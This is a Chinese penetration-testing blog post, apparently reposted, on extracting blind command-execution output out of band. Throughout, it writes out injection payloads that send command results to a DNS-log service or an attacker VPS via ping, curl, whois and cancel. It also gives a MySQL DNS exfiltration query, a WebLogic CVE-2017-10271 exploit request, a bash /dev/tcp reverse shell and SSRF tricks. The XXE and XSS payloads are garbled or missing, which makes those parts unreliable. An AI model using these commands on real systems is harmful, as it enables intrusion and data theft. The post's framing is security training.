干货|如何在无回显时渗透_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
企业服务导航

干货|如何在无回显时渗透

发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370


干货|如何在无回显时渗透

前言 在集群智慧云安服渗透测试的很多时候,我们可能都得不到数据的回显。由于得不到数据的回显,我们就无法进一步判断我们集群智慧云安服渗透测试的结果。所以本文告诉大家,在没有回显的时候,我们又该如何测试。 1.利用ping ping `命令`.dnslog 有很多免费的dnslog使用,例如BurpSuite自带的模块——Burp Collaborator client,当然社区版没有这个功能,专业版的BurpSuite才具有。                                         Burp Collaborator client 还有免费的ceye.io、吐司等,这里不做过多的介绍,以Burp Collaborator client为例。 假如我们需要执行一个uname,我们先点击Copy to clipboard,接着组装我们的语句即可,最后执行它 Copy to clipboard 待它执行几秒钟,我们的Burp Collaborator client就会有回应 ping执行 回应 我们直接在本机执行uname验证一下 uname 2.利用curl Win10和WinServer2016(或更高版本)均已默认自带curl curl dnslog/`命令|base64|tr 'n' '-'`curl dnslog/`命令|tr 'n' '-'` 执行 你会得到一个http的请求,在请求中就是命令执行的结果 curl结果 在某些极端情况下,你可能需要使用base64编码一下,因为可能某些命令返回的结果为中文 base64结果 去掉/、-以后,对结果进行还原就为命令执行以后的结果 原始结果 前面说的这些都是基于能解析host的时候执行的,然而在很多实际情况中,被渗透的机器根本不会配置dns。在不配置dns的情况下,dnslog就会失效,命令将返回uknown host,由于无法解析host,找不到dnslog的ip,我们也无法从dnslog平台获得命令执行的结果。请接着看下文。 3.利用whois 谈到whois,很多人的第一反应应该是查域名从属吧。其实不然,whois还可以用来回显命令执行的结果。 whois -h vps‘ip -p port `命令`whois -h vps‘ip -p port `命令 |base64` 这里我们需要自行准备一台vps,其实就是有公网ip的机器,在机器上监听一个端口。例如我在我的vps上监听6666,且在目标机器执行一个uname nc -l -p 6666 -vvv 监听6666 那么我们就在目标机器上执行如下命令(myip为我的vpsip) whois -h myip -p 6666 `uname`whois -h myip -p 6666 `uname |base64` 目标机 vps 如图就返回了我们的命令执行结果 4.利用cancel 其实除了whois以外,还有cancel可以利用 cancel -u "$(命令)" -h vps'ip:port 我们同样需要一台vps,在上面监听任意端口 目标机 攻击机 去除方框中的"my-jobs",即为命令回显结果 后记 那么这些东西可以配合哪些场景使用了? 1.SQL注入 当我们的SQL注入为盲注时,它可是不会返回结果的。 select load_file(concat('\\\\',(SQL语句),'.dnslog\随便输入字母')) 众所周知,mysql中load_file是可以执行dns请求的,注意dnslog前面有个".",千万不要忘记了。 2.XXE 我们只需要把dtd文件换成下面的内容即可 #payload1%remote;]>#payload2">%all; 3.RCE 前面的部分基本上都在展示执行命令,这里我们结合一下Weblogic XML Decoder反序列化(CVE-2017-10271) POST /wls-wsat/CoordinatorPortType HTTP/1.1Host:x.x.x.x:xCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 640 /bin/bash-c命令 我们只需要替换一下上文中命令的部分为如下的任意一种(请注意html实体编码,payload默认为Linux,win需要修改/bin/bash为cmd或者cmd.exe,-c为/c) html实体编码 ping `命令`.dnslogcurl dnslog/`命令|base64|tr 'n' '-'`curl dnslog/`命令|tr 'n' '-'`whois -h vps‘ip -p port `命令`whois -h vps‘ip -p port `命令 |base64`cancel -u "$(命令)" -h vps'ip:port #直接反弹shell bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 所有的命令都需要注意转换html实体编码 例如原本的反弹命令为 bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 转换后为 bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 可以去这里转换:https://www.qqxiuzi.cn/bianma/zifushiti.php 4.SSRF 我们可以在需要的参数后面直接修改为vps'ip或者dnslog地址 如果你使用vps,那么你依然需要在vps上先执行监听端口 如果你使用dnslog,那么直接修改为dnslog地址 例如某参数为video_url,修改为如下 video_url=http://vps'ip:portvideo_url=dnslog 5.XSS 使用如下Payload 文章来源:乌雲安全 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担! 如侵权请私聊我们删文 END

干货|如何在无回显时渗透